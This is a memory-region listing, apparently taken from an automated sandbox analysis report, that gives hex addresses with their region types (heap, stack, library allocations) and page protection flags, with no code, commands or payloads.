page read and write
33FF000
stack
page read and write
29C2000
heap
page read and write
3BA8000
trusted library allocation
page read and write
22772417000
heap
page read and write
29C2000
heap
page read and write
51D000
stack
page read and write
2C90000
heap
page read and write
8B0000
heap
page read and write
7E2000
heap
page read and write
2746000
heap
page read and write
3C49000
trusted library allocation
page read and write
3B0000
heap
page read and write
2AF9000
heap
page read and write
2912000
heap
page read and write
2D5E000
stack
page read and write
3EAD000
trusted library allocation
page read and write
29F0000
heap
page read and write
31E9000
heap
page read and write
4F4000
unkown
page readonly
2BAE000
stack
page read and write
235E000
stack
page read and write
460F000
stack
page read and write
3C66000
trusted library allocation
page read and write
5C0000
heap
page read and write
3C61000
trusted library allocation
page read and write
61D000
stack
page read and write
7D8000
heap
page read and write
2A1B000
heap
page read and write
3C81000
trusted library allocation
page read and write
2DB0000
heap
page read and write
3BA8000
trusted library allocation
page read and write
39A1000
trusted library allocation
page read and write
34E6000
heap
page read and write
3C6B000
trusted library allocation
page read and write
3291000
heap
page read and write
2AD1000
heap
page read and write
7D8000
heap
page read and write
288B000
heap
page read and write
2554000
heap
page read and write
3E5B000
trusted library allocation
page read and write
3392000
trusted library allocation
page read and write
22772430000
heap
page read and write
77C000
trusted library allocation
page read and write
3DE9000
trusted library allocation
page read and write
408000
unkown
page readonly
29C2000
heap
page read and write
500000
heap
page read and write
3BB2000
trusted library allocation
page read and write
2834000
heap
page read and write
3B76000
trusted library allocation
page read and write
351D000
heap
page read and write
29C2000
heap
page read and write
2A11000
heap
page read and write
27E0000
heap
page read and write
3D30000
trusted library allocation
page read and write
288E000
heap
page read and write
2AE6000
heap
page read and write
3290000
heap
page read and write
2866000
heap
page read and write
3206000
heap
page read and write
2AA7000
heap
page read and write
31FD000
heap
page read and write
520000
heap
page read and write
7B6000
heap
page read and write
303E000
stack
page read and write
4610000
heap
page read and write
3C81000
trusted library allocation
page read and write
35D5000
heap
page read and write
7CB000
heap
page read and write
35C0000
heap
page read and write
22772401000
heap
page read and write
330F000
stack
page read and write
3376000
heap
page read and write
556000
heap
page read and write
3B20000
trusted library allocation
page read and write
3340000
heap
page read and write
3E04000
trusted library allocation
page read and write
3B68000
trusted library allocation
page read and write
30AF000
stack
page read and write
3C81000
trusted library allocation
page read and write
2FBE000
stack
page read and write
3D27000
trusted library allocation
page read and write
52F0000
heap
page read and write
3BA7000
trusted library allocation
page read and write
5B5000
heap
page read and write
2D57000
heap
page read and write
40B000
unkown
page read and write
31AF000
stack
page read and write
29C2000
heap
page read and write
1010000
trusted library allocation
page read and write
29C1000
heap
page read and write
3BAB000
trusted library allocation
page read and write
3291000
heap
page read and write
2365000
heap
page read and write
6A6000
heap
page read and write
2FC5000
heap
page read and write
2DC0000
heap
page read and write
408C000
trusted library allocation
page read and write
2A09000
heap
page read and write
2700000
heap
page read and write
3392000
trusted library allocation
page read and write
4088000
trusted library allocation
page read and write
3C56000
trusted library allocation
page read and write
2A50000
heap
page read and write
408E000
trusted library allocation
page read and write
4400000
trusted library allocation
page read and write
6DE000
heap
page read and write
2E0F000
stack
page read and write
2DED000
stack
page read and write
3393000
trusted library allocation
page read and write
3291000
heap
page read and write
2EE7000
heap
page read and write
254A000
heap
page read and write
29BD000
stack
page read and write
68D000
heap
page read and write
1F0000
heap
page read and write
2277240B000
heap
page read and write
3C81000
trusted library allocation
page read and write
98000
stack
page read and write
3A7E000
trusted library allocation
page read and write
3BAB000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
7DC000
heap
page read and write
1010000
trusted library allocation
page read and write
570000
heap
page read and write
2D86000
heap
page read and write
3C4000
heap
page read and write
3BA3000
trusted library allocation
page read and write
32F0000
heap
page read and write
39A1000
trusted library allocation
page read and write
3530000
heap
page read and write
B64000
heap
page read and write
3C81000
trusted library allocation
page read and write
22772420000
heap
page read and write
2EB0000
heap
page read and write
33B1000
heap
page read and write
3340000
heap
page read and write
3D6B000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
29C2000
heap
page read and write
2E36000
heap
page read and write
29C2000
heap
page read and write
2FC7000
heap
page read and write
3291000
heap
page read and write
29C0000
heap
page read and write
353E000
stack
page read and write
3A81000
trusted library allocation
page read and write
288B000
heap
page read and write
3B17000
trusted library allocation
page read and write
34AE000
stack
page read and write
750000
trusted library allocation
page read and write
7C2000
heap
page read and write
2EC1000
heap
page read and write
3C43000
trusted library allocation
page read and write
10C3000
heap
page read and write
3291000
heap
page read and write
3C6E000
trusted library allocation
page read and write
2FD3000
heap
page read and write
29C2000
heap
page read and write
29C2000
heap
page read and write
3392000
trusted library allocation
page read and write
31F4000
heap
page read and write
2E49000
heap
page read and write
22772630000
heap
page read and write
3BB2000
trusted library allocation
page read and write
352C000
heap
page read and write
346E000
stack
page read and write
2DAD000
stack
page read and write
3291000
heap
page read and write
2E1D000
heap
page read and write
6DB000
heap
page read and write
3C4E000
trusted library allocation
page read and write
28EF000
stack
page read and write
3350000
heap
page read and write
3E1F000
trusted library allocation
page read and write
29C2000
heap
page read and write
2E20000
heap
page read and write
223E000
stack
page read and write
3291000
heap
page read and write
3C81000
trusted library allocation
page read and write
2841000
heap
page read and write
3C18000
trusted library allocation
page read and write
2872000
heap
page read and write
38A1000
trusted library allocation
page read and write
2EA2000
heap
page read and write
3C4000
heap
page read and write
3BA5000
trusted library allocation
page read and write
28DD000
stack
page read and write
38D9000
trusted library allocation
page read and write
64E000
stack
page read and write
3516000
heap
page read and write
3150000
heap
page read and write
3376000
heap
page read and write
22772446000
heap
page read and write
39BA000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
408000
unkown
page readonly
2AF0000
heap
page read and write
5B0000
heap
page read and write
3C43000
trusted library allocation
page read and write
2740000
heap
page read and write
3E33000
trusted library allocation
page read and write
25AF000
stack
page read and write
3BA8000
trusted library allocation
page read and write
3D17000
trusted library allocation
page read and write
2310000
heap
page read and write
2AFD000
stack
page read and write
39A1000
trusted library allocation
page read and write
387F000
stack
page read and write
3BA8000
trusted library allocation
page read and write
32A0000
heap
page read and write
3DC4000
trusted library allocation
page read and write
286E000
heap
page read and write
428000
unkown
page read and write
3CFC000
trusted library allocation
page read and write
5FE000
stack
page read and write
339C000
trusted library allocation
page read and write
2A3E000
stack
page read and write
ECD000
unkown
page readonly
22772449000
heap
page read and write
3291000
heap
page read and write
66A000
heap
page read and write
2D16000
heap
page read and write
2746000
heap
page read and write
A2F000
stack
page read and write
288B000
heap
page read and write
2FC0000
heap
page read and write
3BA6000
trusted library allocation
page read and write
26C000
stack
page read and write
3525000
heap
page read and write
3C4000
heap
page read and write
760000
heap
page read and write
2E19000
heap
page read and write
2FF0000
heap
page read and write
22772417000
heap
page read and write
3BAA000
trusted library allocation
page read and write
3BA5000
trusted library allocation
page read and write
85C000
stack
page read and write
6D0000
heap
page read and write
2D1F000
stack
page read and write
2D31000
heap
page read and write
3392000
trusted library allocation
page read and write
3291000
heap
page read and write
3C34000
trusted library allocation
page read and write
283E000
stack
page read and write
750000
trusted library allocation
page read and write
29C2000
heap
page read and write
2740000
heap
page read and write
3396000
trusted library allocation
page read and write
7C7000
heap
page read and write
3291000
heap
page read and write
600000
heap
page read and write
499E000
stack
page read and write
7DC000
heap
page read and write
2277243E000
heap
page read and write
2AEE000
heap
page read and write
6BB000
heap
page read and write
38A1000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
5DE000
stack
page read and write
29C2000
heap
page read and write
3C4000
heap
page read and write
2BB0000
heap
page read and write
771000
trusted library allocation
page read and write
313F000
stack
page read and write
3386000
heap
page read and write
2868000
heap
page read and write
3A81000
trusted library allocation
page read and write
6A9000
heap
page read and write
750000
trusted library allocation
page read and write
3BA5000
trusted library allocation
page read and write
69E000
heap
page read and write
3C81000
trusted library allocation
page read and write
3391000
trusted library allocation
page read and write
3D27000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
2830000
heap
page read and write
31EB000
heap
page read and write
275D000
stack
page read and write
2DBD000
stack
page read and write
31F1000
heap
page read and write
3C4B000
trusted library allocation
page read and write
32B0000
heap
page read and write
270D000
stack
page read and write
3386000
heap
page read and write
7DC000
heap
page read and write
2C3E000
stack
page read and write
26E0000
heap
page read and write
625000
unkown
page readonly
3730000
heap
page read and write
750000
trusted library allocation
page read and write
5A0000
heap
page read and write
39A1000
trusted library allocation
page read and write
2FA0000
heap
page read and write
3291000
heap
page read and write
29C2000
heap
page read and write
2820000
heap
page read and write
929DEFF000
stack
page read and write
39A1000
trusted library allocation
page read and write
65E000
stack
page read and write
2E75000
heap
page read and write
38A1000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
2EC4000
heap
page read and write
2726000
heap
page read and write
3480000
heap
page read and write
3D7C000
trusted library allocation
page read and write
29C2000
heap
page read and write
2D3D000
heap
page read and write
342E000
stack
page read and write
3496000
heap
page read and write
45C000
stack
page read and write
3C66000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
3CEB000
trusted library allocation
page read and write
3C4000
heap
page read and write
3BAC000
trusted library allocation
page read and write
3BA8000
trusted library allocation
page read and write
2D86000
heap
page read and write
2900000
heap
page read and write
7CB000
heap
page read and write
3BAB000
trusted library allocation
page read and write
3BA8000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
3C69000
trusted library allocation
page read and write
3C69000
trusted library allocation
page read and write
401000
unkown
page execute read
2E54000
heap
page read and write
4085000
trusted library allocation
page read and write
3110000
heap
page read and write
3C61000
trusted library allocation
page read and write
3CFD000
trusted library allocation
page read and write
3D3E000
trusted library allocation
page read and write
660000
heap
page read and write
2EA2000
heap
page read and write
337E000
stack
page read and write
38A1000
trusted library allocation
page read and write
23BE000
stack
page read and write
2720000
heap
page read and write
2C90000
heap
page read and write
29C2000
heap
page read and write
2E5B000
heap
page read and write
3D57000
trusted library allocation
page read and write
351A000
heap
page read and write
38A1000
trusted library allocation
page read and write
7B6000
heap
page read and write
3D31000
trusted library allocation
page read and write
4FD000
stack
page read and write
2849000
heap
page read and write
3BA8000
trusted library allocation
page read and write
2270000
heap
page read and write
6E7000
heap
page read and write
550000
heap
page read and write
1DE000
stack
page read and write
3A81000
trusted library allocation
page read and write
34DE000
stack
page read and write
750000
trusted library allocation
page read and write
408D000
trusted library allocation
page read and write
500000
unkown
page readonly
2ECA000
heap
page read and write
38A1000
trusted library allocation
page read and write
3BA2000
trusted library allocation
page read and write
3358000
heap
page read and write
3170000
heap
page read and write
3C81000
trusted library allocation
page read and write
2C9B000
heap
page read and write
2839000
heap
page read and write
3C4000
heap
page read and write
38A1000
trusted library allocation
page read and write
26BE000
stack
page read and write
2AB8000
heap
page read and write
7C7000
heap
page read and write
275D000
stack
page read and write
1010000
trusted library allocation
page read and write
288B000
heap
page read and write
27CF000
stack
page read and write
7E5000
heap
page read and write
29C2000
heap
page read and write
30B000
stack
page read and write
2B0E000
unkown
page read and write
7C7000
heap
page read and write
29C2000
heap
page read and write
2EA2000
heap
page read and write
2E10000
heap
page read and write
3C4000
heap
page read and write
551000
unkown
page execute read
29EB000
heap
page read and write
3C18000
trusted library allocation
page read and write
29E6000
heap
page read and write
2547000
heap
page read and write
400000
unkown
page readonly
3B8D000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
2AA0000
heap
page read and write
4088000
trusted library allocation
page read and write
3BA1000
trusted library allocation
page read and write
3046000
heap
page read and write
39A1000
trusted library allocation
page read and write
2AB5000
heap
page read and write
2AFE000
stack
page read and write
34E0000
heap
page read and write
280E000
stack
page read and write
2ED0000
heap
page read and write
39A1000
trusted library allocation
page read and write
2D10000
heap
page read and write
400000
unkown
page readonly
38A1000
trusted library allocation
page read and write
19D000
stack
page read and write
4085000
trusted library allocation
page read and write
4B4F000
heap
page read and write
4080000
trusted library allocation
page read and write
7B6000
heap
page read and write
771000
trusted library allocation
page read and write
3CD2000
trusted library allocation
page read and write
3BAF000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
3C6D000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
2C16000
heap
page read and write
7E5000
heap
page read and write
E31000
unkown
page execute read
3260000
heap
page read and write
340E000
stack
page read and write
2EFD000
stack
page read and write
4080000
trusted library allocation
page read and write
3D6A000
trusted library allocation
page read and write
27ED000
stack
page read and write
36AF000
stack
page read and write
2FAD000
stack
page read and write
7C7000
heap
page read and write
10A3000
heap
page read and write
3D3E000
trusted library allocation
page read and write
2543000
heap
page read and write
7C2000
heap
page read and write
3330000
heap
page read and write
408A000
trusted library allocation
page read and write
530000
heap
page read and write
2EE0000
heap
page read and write
289E000
heap
page read and write
3399000
trusted library allocation
page read and write
3DE2000
trusted library allocation
page read and write
32D0000
heap
page read and write
There are 1592 hidden memdumps, click here to show them.